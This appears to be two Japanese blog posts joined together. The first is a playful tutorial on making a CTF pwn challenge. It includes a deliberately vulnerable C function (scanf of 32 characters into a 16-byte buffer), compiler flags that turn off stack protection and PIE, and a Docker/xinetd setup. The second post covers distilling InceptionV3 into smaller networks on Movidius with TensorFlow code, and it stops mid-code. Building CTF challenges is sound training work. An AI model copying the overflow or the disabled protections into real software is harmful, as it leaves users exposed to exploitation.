初めてのPWN作り
10月27日はSECCON CTFオンライン予選!
手作りのPWN問題を職場の同僚や友達に送って,日ごろの感謝の気持ちを伝えてみませんか?
材料
- ★Docker 1つ
- xinetd 1つ
- ★git 適量
- ★gcc 1つ
- ★Python2 1つ
- ★pwntools 1つ
- ★vim 3つ
- ★お好みのテキストエディタ 少々
- お好みのLinuxディストリビューション(ArchLinuxを使用) 1つ
下準備
Linuxにアップデートを入れてパッケージマネージャで馴染ませせてから,★を入れて混ぜ合わせる.:
ディストリビューションを確認して,その都度正しいパッケージマネージャでしっかり入れる.
# Arch sudo pacman -Syu && sudo pacman -S docker git gcc-multilib python2 vim python2-pip && sudo pip2 install pwntools
# Ubuntu sudo apt update && sudo apt upgrade && sudo apt install docker-ce git gcc python2 vim python2-pip && sudo pip2 install pwntools
問題作り
1. 生地を用意する
Buffer Over FlowやFormat String Attackなどどんな生地にするかを決める.
2.方法を考える
シェルコードやROPなどどんな方法でやるかを考えて適切なセキュリティ機構を選択する.
3.作る
作る.
【ここでおいしく作るためのワンポイントアドバイス!】
1. ユーザーに何かを入力してもらう前にfflush(stdout);を呼び出そう!バッファされているputs()やprintf()の出力が全部出力されて,解いてくれる人からの好感度もアップ!
2. 攻撃対象の関数はmain()以外の関数にしよう!インストラクションポインタより前にスタックポインタがエラーを吐いてしまうから,main()のretではeipは振り向いてくれないぞ!
#include <stdio.h> void print_flag(void) { // 略 } int in_name(void) { char name[16]; printf("Type Your Name : "); fflush(stdout); scanf("%32s", name); return 0; } int main(void) { in_name(); return 0; }
4.コンパイル
コンパイルをする.
【注意!!】普段のプログラミングでは何気なく使っているこのコンパイラ,PWNを作るときには注意深く気持ちを込めてオプションを決定しよう!
mkdir bin gcc pwn.c -o bin/pwn -m32 -O0 -fno-stack-protector -no-pie -fno-pie
5.完成
問題は完成!
実際に攻撃できるかどうかpwntoolsを使って味見をしてみよう!
動作環境作り
ここまでで問題は完成したけど,ラッピングをして実際に動作するようにしてあげよう!
なんかめんどくさくなってきたけど頑張って!
【なんで環境作るん?】
pwnでルート取らせる問題で実際のルート取られたら大変やろ?
だからDockerでルート取られてもいい環境作るんやで(まる)
別に自分で試すだけなら
socat TCP-LISTEN:8080,reuseaddr,fork EXEC:./pwn
でおk
1.サービス起動
Archだったらこれやる.
sudo systemctl start docker.service
2.設定ファイルの用意
設定ファイル落としてくる
git clone https://github.com/Eadom/ctf_xinetd
ctf.xinetdのserver_args = --userspec=1000:1000 /home/ctf ./helloworld部分をhelloworldから自分の実行ファイル名に書き換える
3.ビルド
ビルドする.
sudo docker build -t "pwn"
4.実行
sudo docker run --rm -d -p "9999:9999" -h "pwn" --name="pwn" pwn
5.接続確認
わーいできたー!
接続確認.
nc localhost 9999
さっき作ったpwntoolsを今度はネットワーク越しに実行
Oh, YEAH !
InceptionV3を蒸留してMovidiusで動かす
公開できるレベルではないくらいの雑さ
もっときれいにしたらgithubにアップする予定
テキトーなCNNに蒸留してみる
テキトーなCNN
入力 : 299 x 299 x 3
出力 : caltech101
conv2d(299,299,3)
conv2d(,,32)
conv2d(, , 64)
conv2d(, , 128)
dense(625)
dropout
dense(101)
結果
親
---------------------------------------------- EPOCH 3/3 100%|██████████| 72/72 [00:29<00:00, 2.40it/s] 100%|██████████| 54/54 [00:06<00:00, 7.94it/s] loss: 0.8792 val accuracy: 0.8924
子
---------------------------------------------- EPOCH 30/30 100%|██████████| 72/72 [00:17<00:00, 4.09it/s] 100%|██████████| 54/54 [00:03<00:00, 16.21it/s] loss: 7.9115 val accuracy: 0.4034
蒸留なしで子
---------------------------------------------- EPOCH 30/30 100%|██████████| 72/72 [00:10<00:00, 6.81it/s] 100%|██████████| 54/54 [00:03<00:00, 15.68it/s] loss: 16.6656 val accuracy: 0.4259
負けた
Movidiusで動かす
mvNCProfile
で推論の時間だけ測定できた。
299 x 299 x 3の画像で、1枚当たり130.27msらしい
実測値:
Time : 58.298219442367554 (435 images)
1枚当たり134msとのこと
つまり、画像のロードには4msくらいしかかかってない
ちなみに、パラメータ数は83M
まとめ
InceptionV3をファインチューニングして、それを別のネットワークに蒸留したものをMovidiusで動かせるようになった。
InceptionV3をMobilenetV1 224x224 a=1に学習させる
tensorflow/modelsのnetsをインストール
python setup.py install
そしたらロードできるようになる
import nets.mobilenet_v1
で、
stu2_logits, stu2_end_points = nets.mobilenet_v1.mobilenet_v1()
をするときに、得られるstu2_end_points
にはmobilenetの詳細が入ってる。
これの中身を見るといろいろ分かる。
['Conv2d_0', 'Conv2d_1_depthwise', 'Conv2d_1_pointwise', 'Conv2d_2_depthwise', 'Conv2d_2_pointwise', 'Conv2d_3_depthwise', 'Conv2d_3_pointwise', 'Conv2d_4_depthwise', 'Conv2d_4_pointwise', 'Conv2d_5_depthwise', 'Conv2d_5_pointwise', 'Conv2d_6_depthwise', 'Conv2d_6_pointwise', 'Conv2d_7_depthwise', 'Conv2d_7_pointwise', 'Conv2d_8_depthwise', 'Conv2d_8_pointwise', 'Conv2d_9_depthwise', 'Conv2d_9_pointwise', 'Conv2d_10_depthwise', 'Conv2d_10_pointwise', 'Conv2d_11_depthwise', 'Conv2d_11_pointwise', 'Conv2d_12_depthwise', 'Conv2d_12_pointwise', 'Conv2d_13_depthwise', 'Conv2d_13_pointwise', 'AvgPool_1a', 'Logits', 'Predictions']
モデルを作るときに、出力層の数は指定できるけど、学習済みチェックポイントと一致しないから、変わった部分の重みは読み込まないようにしなくちゃダメ
例えば、上のを見るとLogits
とPredictions
があやしい
print("shape of logits: ", ep2['Logits'].shape) print("shape of prediction: ", ep2['Predictions'].shape)
気になるやつらのシェイプを確認して、自分が指定した出力層の数になってたら、そのやつらには読み込ませない。
mbnet_pretrained_include = ["MobilenetV1"] mbnet_pretrained_exclude = ["MobilenetV1/Predictions", "MobilenetV1/Logits"] mbnet_pretrained_vars = tf.contrib.framework.get_variables_to_restore( include=mbnet_pretrained_include, exclude=mbnet_pretrained_exclude) mbnet_pretrained_saver = tf.train.Saver( mbnet_pretrained_vars, name="mobilenet_pretrained_saver")
やってみる
親
---------------------------------------------- EPOCH 30/30 100%|██████████| 72/72 [00:16<00:00, 4.35it/s] 100%|██████████| 54/54 [00:03<00:00, 13.75it/s] loss: 0.0003 val accuracy: 0.8582
子
---------------------------------------------- EPOCH 72/300 100%|██████████| 72/72 [00:17<00:00, 4.01it/s] 100%|██████████| 54/54 [00:02<00:00, 23.67it/s] loss: 6.1732 val accuracy: 0.4126
Movidius用に変換してみる
mvNCCompile
すると
FailedPreconditionError (see above for traceback): Attempting to use uninitialized value MobilenetV1/Conv2d_0/BatchNorm/moving_mean
とのこと、
変換するときのSaverが保存する変数がtrainable
のみになってたので、tf.global_variables()
にしたところ、
NotFoundError: Key MobilenetV1/Conv2d_0/BatchNorm/moving_mean not found in checkpoint
ということは、根本的に保存した時点でこの変数が抜けていたようだ。
なので、おおもとのファイルでもtf.global_variables()
にして保存した。
[Error 5] Toolkit Error: Stage Details Not Supported: Top Not Found preprocess/rescaled_inputs
[Error 5] Toolkit Error: Stage Details Not Supported: Top Not Found mbnet_struct/truediv
別のエラーになった。
divに対応していないのだろうか?
前者は事前に255で割って入力することにした。
後者は使ってなかった。
消して再実行
tokunn@nanase 9:00:09 [~/Documents/distil_incep2mbnet0921] $ python3 movidius.py /home/tokunn/caltech101/butterfly 2>/dev/null Image path : /home/tokunn/caltech101/butterfly/*.jpg or *.png ['image_0032.jpg', 'image_0073.jpg', 'image_0017.jpg', 'image_0089.jpg', 'image_0085.jpg', 'image_0078.jpg', 'image_0056.jpg', 'image_0069.jpg', 'image_0074.jpg', 'image_0025.jpg'] imgshape (91, 224, 224) Start predicting ... butterfly Faces butterfly chandelier butterfly Faces chandelier butterfly butterfly butterfly butterfly revolver butterfly butterfly revolver butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly chandelier butterfly butterfly butterfly butterfly butterfly butterfly butterfly sunflower revolver butterfly chandelier butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly chandelier butterfly butterfly butterfly Faces butterfly Faces butterfly butterfly butterfly Faces butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly chandelier cellphone butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly Time : 3.817107915878296 (91 images)
すばらしい!
ソースコード
テキトーなCNN編
親子
#!/usr/bin/env python # coding: utf-8 # In[1]: import os,time,glob os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" os.environ["CUDA_VISIBLE_DEVICES"] = "0" import tensorflow as tf import numpy as np import tensorflow.contrib.slim as slim import tensorflow.contrib.slim.nets #from __future__ import print_function, division import loadimg_caltech as loadimg from tqdm import tqdm import matplotlib.pyplot as plt start = time.time() # In[2]: np_aryname = './models/data{0}.npy' try: # LOAD X_train = np.load(np_aryname.format('X_train')) Y_train = np.load(np_aryname.format('Y_train')) X_test = np.load(np_aryname.format('X_test')) Y_test = np.load(np_aryname.format('Y_test')) number_of_classes = np.asscalar(np.load(np_aryname.format('number_of_classes'))) except FileNotFoundError: print("### Load from Images ###") X_train, Y_train, X_test, Y_test, number_of_classes = loadimg.loadimg( '/home/tokunn/caltech101') np.save(np_aryname.format('X_train'), X_train) np.save(np_aryname.format('Y_train'), Y_train) np.save(np_aryname.format('X_test'), X_test) np.save(np_aryname.format('Y_test'), Y_test) np.save(np_aryname.format('number_of_classes'), number_of_classes) print("X_train", X_train.shape) print("Y_train", Y_train.shape) print("X_test", X_test.shape) print("Y_test", Y_test.shape) print("Number of Classes", number_of_classes) # In[3]: SNAPSHOT_FILE = "./models/snapshot.ckpt" STU_SNAPSHOT_FILE = "./models/student_snapshot.ckpt" PRETRAINED_SNAPSHOT_FILE = "./models/inception_v3.ckpt" # somewhere to store the tensorboard files - to visualise the graph TENSORBOARD_DIR = "logs" #[os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))] # IMAGE SETTINGS IMG_WIDTH, IMG_HEIGHT = [299,299] # Dimensions required by inception V3 N_CHANNELS = 3 # Number of channels required by inception V3 N_CLASSES = number_of_classes # Change N_CLASSES to suit your needs temperature = 4 # In[4]: def NetworkStudent(input,keep_prob_conv,keep_prob_hidden,scope='Student', reuse = False): with tf.variable_scope(scope, reuse = reuse) as sc: with slim.arg_scope([slim.conv2d], kernel_size = [3,3], stride = [1,1], biases_initializer=tf.constant_initializer(0.0), activation_fn=tf.nn.relu): net = slim.conv2d(input, 32, scope='conv1') net = slim.max_pool2d(net,[2, 2], 2, scope='pool1') net = tf.nn.dropout(net, keep_prob_conv) net = slim.conv2d(net, 64,scope='conv2') net = slim.max_pool2d(net,[2, 2], 2, scope='pool2') net = tf.nn.dropout(net, keep_prob_conv) net = slim.conv2d(net, 128,scope='conv3') net = slim.max_pool2d(net,[2, 2], 2, scope='pool3') net = tf.nn.dropout(net, keep_prob_conv) net = slim.conv2d(net, 256,scope='conv4') net = slim.max_pool2d(net,[2, 2], 2, scope='pool4') net = tf.nn.dropout(net, keep_prob_conv) net = slim.flatten(net) with slim.arg_scope([slim.fully_connected], biases_initializer=tf.constant_initializer(0.0), activation_fn=tf.nn.relu) : net = slim.fully_connected(net,1000,scope='fc1') # 625 net = tf.nn.dropout(net, keep_prob_hidden) net = slim.fully_connected(net,N_CLASSES,activation_fn=None,scope='fc2') #net = tf.nn.softmax(net/temperature) return net # In[5]: def loss(prediction,output):#,temperature = 1): cross_entropy = tf.reduce_mean(-tf.reduce_sum( tf.cast(output, tf.float32) * tf.log(tf.clip_by_value(prediction,1e-10,1.0)), reduction_indices=[1])) #correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1)) #accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) return cross_entropy#,accuracy # In[6]: graph = tf.Graph() with graph.as_default(): # INPUTS with tf.name_scope("inputs") as scope: input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS) tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X") tf_Y = tf.placeholder(tf.int32, shape=[None, N_CLASSES], name="Y") tf_alpha = tf.placeholder_with_default(0.001, shape=None, name="alpha") tf_is_training = tf.placeholder_with_default(False, shape=None, name="is_training") stu_keep_prob_conv = tf.placeholder(tf.float32) stu_keep_prob_hidden = tf.placeholder(tf.float32) # PREPROCESSING STEPS with tf.name_scope("preprocess") as scope: scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs") # BODY arg_scope = tf.contrib.slim.nets.inception.inception_v3_arg_scope() with tf.contrib.framework.arg_scope(arg_scope): tf_logits, end_points = tf.contrib.slim.nets.inception.inception_v3( scaled_inputs, num_classes=N_CLASSES, is_training=tf_is_training, dropout_keep_prob=0.8) with tf.name_scope("softmax") as scope: tch_y = tf.nn.softmax(tf_logits/temperature, name="teacher_softmax") tch_y_actual = tf.nn.softmax(tf_logits, name="teacher_softmax_actual") # Student stu_logits = NetworkStudent(tf_X, stu_keep_prob_conv, stu_keep_prob_hidden, scope='student') with tf.name_scope("stu_struct"): # softmax stu_y = tf.nn.softmax(stu_logits/temperature, name="softmax") stu_y_actual = tf.nn.softmax(stu_logits, name="actual_softmax") # Seperate vars model_vars = tf.trainable_variables() var_teacher = [var for var in model_vars if 'InceptionV3' in var.name] var_student = [var for var in model_vars if 'student' in var.name] # PREDICTIONS tf_preds = tf.to_int32(tf.argmax(tf_logits, axis=-1), name="preds") # LOSS - Sums all losses (even Regularization losses) with tf.variable_scope('loss') as scope: #unrolled_labels = tf.reshape(tf_Y, (-1,)) #tf.losses.softmax_cross_entropy(onehot_labels=unrolled_labels, tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=tf_logits) tf_loss = tf.losses.get_total_loss() #tf_loss = loss(tch_y_actual, tf_Y) # OPTIMIZATION - Also updates batchnorm operations automatically with tf.variable_scope('opt') as scope: #tf_optimizer = tf.train.AdamOptimizer(tf_alpha, name="optimizer") #update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) # for batchnorm #with tf.control_dependencies(update_ops): # tf_train_op = tf_optimizer.minimize(tf_loss, name="train_op") grad_teacher = tf.gradients(tf_loss, var_teacher) tf_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer") tf_train_step = tf_trainer.apply_gradients(zip(grad_teacher, var_teacher)) # Evaluation with tf.variable_scope('eval') as scope: y = tf.nn.softmax(tf_logits, name='softmax') accuracy = tf.reduce_mean( tf.cast(tf.equal(tf.argmax(y, 1), tf.argmax(tf_Y, 1)), tf.float32) ) # PRETRAINED SAVER SETTINGS # Lists of scopes of weights to include/exclude from pretrained snapshot pretrained_include = ["InceptionV3"] pretrained_exclude = ["InceptionV3/AuxLogits", "InceptionV3/Logits"] # PRETRAINED SAVER - For loading pretrained weights on the first run pretrained_vars = tf.contrib.framework.get_variables_to_restore( include=pretrained_include, exclude=pretrained_exclude) tf_pretrained_saver = tf.train.Saver(pretrained_vars, name="pretrained_saver") # Student with tf.name_scope("stu_train"): # loss tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=stu_logits) stu_loss1 = tf.losses.get_total_loss() #stu_loss1 = loss(stu_y_actual, tf_Y) stu_loss2 = tf.reduce_mean(- tf.reduce_sum(tch_y * tf.log( tf.clip_by_value(stu_y, 1e-10,1.0)), reduction_indices=1)) stu_loss = 0.2 * stu_loss1 + stu_loss2 #stu_loss = stu_loss1 # optimization grad_student = tf.gradients(stu_loss,var_student) stu_trainer = tf.train.RMSPropOptimizer(learning_rate = 0.0002) #stu_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer") #stu_trainer = tf.train.AdadeltaOptimizer() train_step_student = stu_trainer.apply_gradients(zip(grad_student, var_student)) #stu_optimizer = tf.train.AdamOptimizer(tf_alpha, name="stu_optimizer") #stu_train_op = tf_optimizer.minimize(stu_loss, name="stu_train_op") # evaluation stu_accuracy = tf.reduce_mean( tf.cast(tf.equal(tf.argmax(stu_y_actual, 1), tf.argmax(tf_Y, 1)), tf.float32) ) # MAIN SAVER - For saving/restoring your complete model tf_saver = tf.train.Saver(var_teacher, name="saver") # STUDENT SAVER stu_saver = tf.train.Saver(var_student, name="stu_saver") # TENSORBOARD - To visialize the architecture with tf.variable_scope('tensorboard') as scope: tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph) tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1) # In[7]: def initialize_vars(session): # INITIALIZE VARS LOAD_FROM_CHECKPOINT = False if LOAD_FROM_CHECKPOINT: #tf.train.checkpoint_exists(SNAPSHOT_FILE): print(" Loading from Main Checkpoint") session.run(tf.global_variables_initializer()) tf_saver.restore(session, SNAPSHOT_FILE) else: print("Initializing from Pretrained Weights") session.run(tf.global_variables_initializer()) tf_pretrained_saver.restore(session, PRETRAINED_SNAPSHOT_FILE) # In[ ]: with tf.Session(graph=graph) as sess: n_epochs = 5 batch_size = 32 # small batch size so inception v3 can be run on laptops steps_per_epoch = len(X_train)//batch_size // 3 # FOR DEBUG steps_per_epoch_val = len(X_test)//batch_size initialize_vars(session=sess) print("##### Teacher Training Section #####") for epoch in range(n_epochs): print("----------------------------------------------", flush=True) print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ') ## TRAINING for step in tqdm(range(steps_per_epoch)): # EXTRACT A BATCH OF TRAINING DATA X_batch = X_train[batch_size*step: batch_size*(step+1)] Y_batch = Y_train[batch_size*step: batch_size*(step+1)] # RUN ONE TRAINING STEP - feeding batch of data feed_dict = {tf_X: X_batch, tf_Y: Y_batch, tf_alpha:0.0001, tf_is_training: True} #loss, _ = sess.run([tf_loss, tf_train_op], feed_dict=feed_dict) tf_train_step.run(feed_dict=feed_dict) ## EVALUATE val_accuracy = [] for step in tqdm(range(steps_per_epoch_val)): # EXTRACT A BATCH OF TEST DATA X_batch = X_test[batch_size*step: batch_size*(step+1)] Y_batch = Y_test[batch_size*step: batch_size*(step+1)] # Evalution feed_dict = {tf_X: X_batch, tf_Y: Y_batch, tf_alpha:0.0001, tf_is_training: False} val_accuracy.append(accuracy.eval(feed_dict=feed_dict)) # PRINT FEED BACK - once every `print_every` steps total_val_accuracy = np.average(np.asarray(val_accuracy)) pre_logits, pre_loss = sess.run([tch_y, tf_loss], feed_dict = { tf_X: [X_test[5]], tf_Y: [Y_test[5]], tf_is_training: False }) print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy)) plt.plot(pre_logits[0]) plt.show() # SAVE SNAPSHOT - after each epoch tf_saver.save(sess, SNAPSHOT_FILE) print("### Student Training Section ###") n_epochs = 300 steps_per_epoch = len(X_train)//batch_size // 3 # FOR DEBUG steps_per_epoch_val = len(X_test)//batch_size for epoch in range(n_epochs): print("----------------------------------------------", flush=True) print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ') ## TRAINING for step in tqdm(range(steps_per_epoch)): # EXTRACT A BATCH OF TRAINING DATA X_batch = X_train[batch_size*step: batch_size*(step+1)] Y_batch = Y_train[batch_size*step: batch_size*(step+1)] # RUN ONE TRAINING STEP - feeding batch of data feed_dict = {tf_X: X_batch, tf_Y: Y_batch, #tf_alpha:0.001, stu_keep_prob_conv: 0.8, stu_keep_prob_hidden: 0.5} #loss, _ = sess.run(stu_loss, feed_dict=feed_dict) train_step_student.run(feed_dict=feed_dict) ## EVALUATE val_accuracy = [] for step in tqdm(range(steps_per_epoch_val)): # EXTRACT A BATCH OF TEST DATA X_batch = X_test[batch_size*step: batch_size*(step+1)] Y_batch = Y_test[batch_size*step: batch_size*(step+1)] # Evalution feed_dict = {tf_X: X_batch, tf_Y: Y_batch, #tf_alpha:0.001, stu_keep_prob_conv: 1.0, stu_keep_prob_hidden: 1.0} val_accuracy.append(stu_accuracy.eval(feed_dict=feed_dict)) # PRINT FEED BACK - once every `print_every` steps total_val_accuracy = np.average(np.asarray(val_accuracy)) pre_logits, pre_loss = sess.run([stu_logits, stu_loss], feed_dict = { tf_X: X_batch, tf_Y: Y_batch, #tf_alpha:0.001, stu_keep_prob_conv: 1.0, stu_keep_prob_hidden: 1.0 }) print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy)) plt.plot(pre_logits[0]) plt.show() stu_saver.save(sess, STU_SNAPSHOT_FILE) # In[ ]: end = time.time() print("Time : {0}".format(end-start)) # In[ ]: # In[ ]:
変換用
#!/usr/bin/env python # coding: utf-8 # In[1]: import os,time,glob os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" os.environ["CUDA_VISIBLE_DEVICES"] = "0" import tensorflow as tf import numpy as np import tensorflow.contrib.slim as slim # In[2]: STU_SNAPSHOT_FILE = "./models/student_snapshot.ckpt" STU_FLOZEN_FILE = "./models/student_flozen.ckpt" # somewhere to store the tensorboard files - to visualise the graph TENSORBOARD_DIR = "logs" [os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))] # IMAGE SETTINGS IMG_WIDTH, IMG_HEIGHT = [299,299] # Dimensions required by inception V3 N_CHANNELS = 3 # Number of channels required by inception V3 N_CLASSES = 101 # Change N_CLASSES to suit your needs temperature = 4 # In[3]: def NetworkStudent(input,scope='Student', reuse = False): with tf.variable_scope(scope, reuse = reuse) as sc: with slim.arg_scope([slim.conv2d], kernel_size = [3,3], stride = [1,1], biases_initializer=tf.constant_initializer(0.0), activation_fn=tf.nn.relu): net = slim.conv2d(input, 32, scope='conv1') net = slim.max_pool2d(net,[2, 2], 2, scope='pool1') net = slim.conv2d(net, 64,scope='conv2') net = slim.max_pool2d(net,[2, 2], 2, scope='pool2') net = slim.conv2d(net, 128,scope='conv3') net = slim.max_pool2d(net,[2, 2], 2, scope='pool3') net = slim.conv2d(net, 256,scope='conv4') net = slim.max_pool2d(net,[2, 2], 2, scope='pool4') net = slim.flatten(net) with slim.arg_scope([slim.fully_connected], biases_initializer=tf.constant_initializer(0.0), activation_fn=tf.nn.relu) : net = slim.fully_connected(net,1000,scope='fc1') # 625 net = slim.fully_connected(net,N_CLASSES,activation_fn=None,scope='fc2') #net = tf.nn.softmax(net/temperature) return net # In[4]: graph = tf.Graph() with graph.as_default(): # INPUTS with tf.name_scope("inputs") as scope: input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS) tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X") # PREPROCESSING STEPS with tf.name_scope("preprocess") as scope: scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs") # Student stu_logits = NetworkStudent(tf_X, scope='student') with tf.name_scope("stu_struct"): # softmax stu_y = tf.nn.softmax(stu_logits/temperature, name="softmax") stu_y_actual = tf.nn.softmax(stu_logits, name="actual_softmax") # Seperate vars model_vars = tf.trainable_variables() var_student = [var for var in model_vars if 'student' in var.name] # parameter total_parameters = 0 for variable in tf.trainable_variables(): # shape is an array of tf.Dimension shape = variable.get_shape() #print(shape) #print(len(shape)) variable_parameters = 1 for dim in shape: #print(dim) variable_parameters *= dim.value #print(variable_parameters) total_parameters += variable_parameters print("total params: ",total_parameters) # STUDENT SAVER stu_saver = tf.train.Saver(var_student, name="stu_saver") # TENSORBOARD - To visialize the architecture with tf.variable_scope('tensorboard') as scope: tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph) tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1) # In[5]: with tf.Session(graph=graph) as sess: sess.run(tf.global_variables_initializer()) sess.run(tf.local_variables_initializer()) stu_saver.restore(sess, STU_SNAPSHOT_FILE) stu_saver.save(sess, STU_FLOZEN_FILE) # In[ ]: # In[ ]:
Movidiusでの予測用
import mvnc.mvncapi as mvnc import numpy as np from PIL import Image import cv2 import time, sys, os import glob IMAGE_DIR_NAME = '/home/tokunn/caltech101' if (len(sys.argv) > 1): IMAGE_DIR_NAME = sys.argv[1] #IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images' def predict(input): print("Start prediting ...") devices = mvnc.EnumerateDevices() device = mvnc.Device(devices[0]) device.OpenDevice() # Load graph file data with open('./models/graph', 'rb') as f: graph_file_buffer = f.read() # Initialize a Graph object graph = device.AllocateGraph(graph_file_buffer) start = time.time() for i in range(len(input)): # Write the tensor to the input_fifo and queue an inference graph.LoadTensor(input[i], None) output, userobj = graph.GetResult() print(np.argmax(output), end=' ') stop = time.time() print('') print("Time : {0} ({1} images)".format(stop-start, len(input))) graph.DeallocateGraph() device.CloseDevice() return output if __name__ == '__main__': print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg or *.png'))) jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg')) jpg_list += glob.glob(os.path.join(IMAGE_DIR_NAME, '*.png')) if not len(jpg_list): print("No image file") sys.exit() jpg_list.reverse() print([i.split('/')[-1] for i in jpg_list][:10]) img_list = [] for n in jpg_list: image = cv2.imread(n) image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) image = cv2.resize(image, (299, 299)) img_list.append(image) img_list = np.asarray(img_list)# * (1.0/255.0) #img_list = np.reshape(img_list, [-1, 784]) print("imgshape ", img_list.shape) predict(img_list.astype(np.float16))
InceptionV3をMobilenetV1へ編
親子
#!/usr/bin/env python # coding: utf-8 # In[1]: import os,time,glob,sys #sys.path.append('/home/tokunn/sources/models/research/slim') os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" os.environ["CUDA_VISIBLE_DEVICES"] = "0" import tensorflow as tf import numpy as np import tensorflow.contrib.slim as slim import tensorflow.contrib.slim.nets import nets.mobilenet_v1 #from __future__ import print_function, division import loadimg_caltech as loadimg from tqdm import tqdm import matplotlib.pyplot as plt start = time.time() # In[2]: np_aryname = './models/data{0}.npy' try: # LOAD X_train = np.load(np_aryname.format('X_train')) Y_train = np.load(np_aryname.format('Y_train')) X_test = np.load(np_aryname.format('X_test')) Y_test = np.load(np_aryname.format('Y_test')) number_of_classes = np.asscalar(np.load(np_aryname.format('number_of_classes'))) except FileNotFoundError: print("### Load from Images ###") X_train, Y_train, X_test, Y_test, number_of_classes = loadimg.loadimg( '/home/tokunn/caltech101') np.save(np_aryname.format('X_train'), X_train) np.save(np_aryname.format('Y_train'), Y_train) np.save(np_aryname.format('X_test'), X_test) np.save(np_aryname.format('Y_test'), Y_test) np.save(np_aryname.format('number_of_classes'), number_of_classes) print("X_train", X_train.shape) print("Y_train", Y_train.shape) print("X_test", X_test.shape) print("Y_test", Y_test.shape) print("Number of Classes", number_of_classes) # In[3]: SNAPSHOT_FILE = "./models/snapshot.ckpt" #STU_SNAPSHOT_FILE = "./models/student_snapshot.ckpt" MBNET_SNAPSHOT_FILE = "./models/mbnet_student_snapshot.ckpt" PRETRAINED_SNAPSHOT_FILE = "./models/inception_v3.ckpt" PRETRAINED_MOBILENET_FILE = "./models/mobilenet/mobilenet_v1_1.0_224.ckpt" # somewhere to store the tensorboard files - to visualise the graph TENSORBOARD_DIR = "logs" [os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))] # IMAGE SETTINGS IMG_WIDTH, IMG_HEIGHT = [224,224] # Dimensions required by inception V3 N_CHANNELS = 3 # Number of channels required by inception V3 N_CLASSES = number_of_classes # Change N_CLASSES to suit your needs temperature = 20 # In[4]: def NetworkStudent2(input,scope='Student', tf_is_training=False, reuse = False): #with tf.variable_scope(scope, reuse = reuse) as sc: arg_scope = nets.mobilenet_v1.mobilenet_v1_arg_scope() with tf.contrib.framework.arg_scope(arg_scope): stu2_logits, stu2_end_points = nets.mobilenet_v1.mobilenet_v1( scaled_inputs, num_classes=N_CLASSES, is_training=tf_is_training)#, #depth_multiplier=1.0) return stu2_logits, stu2_end_points # In[5]: # def NetworkStudent(input,keep_prob_conv,keep_prob_hidden,scope='Student', reuse = False): # with tf.variable_scope(scope, reuse = reuse) as sc: # with slim.arg_scope([slim.conv2d], # kernel_size = [3,3], # stride = [1,1], # biases_initializer=tf.constant_initializer(0.0), # activation_fn=tf.nn.relu): # net = slim.conv2d(input, 32, scope='conv1') # net = slim.max_pool2d(net,[2, 2], 2, scope='pool1') # net = tf.nn.dropout(net, keep_prob_conv) # net = slim.conv2d(net, 64,scope='conv2') # net = slim.max_pool2d(net,[2, 2], 2, scope='pool2') # net = tf.nn.dropout(net, keep_prob_conv) # net = slim.conv2d(net, 128,scope='conv3') # net = slim.max_pool2d(net,[2, 2], 2, scope='pool3') # net = tf.nn.dropout(net, keep_prob_conv) # net = slim.conv2d(net, 256,scope='conv4') # net = slim.max_pool2d(net,[2, 2], 2, scope='pool4') # net = tf.nn.dropout(net, keep_prob_conv) # net = slim.flatten(net) # with slim.arg_scope([slim.fully_connected], # biases_initializer=tf.constant_initializer(0.0), # activation_fn=tf.nn.relu) : # net = slim.fully_connected(net,1000,scope='fc1') # 625 # net = tf.nn.dropout(net, keep_prob_hidden) # net = slim.fully_connected(net,N_CLASSES,activation_fn=None,scope='fc2') # #net = tf.nn.softmax(net/temperature) # return net # In[6]: def loss(prediction,output):#,temperature = 1): cross_entropy = tf.reduce_mean(-tf.reduce_sum( tf.cast(output, tf.float32) * tf.log(tf.clip_by_value(prediction,1e-10,1.0)), reduction_indices=[1])) #correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1)) #accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) return cross_entropy#,accuracy # In[7]: graph = tf.Graph() with graph.as_default(): # INPUTS with tf.name_scope("inputs") as scope: input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS) tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X") tf_Y = tf.placeholder(tf.int32, 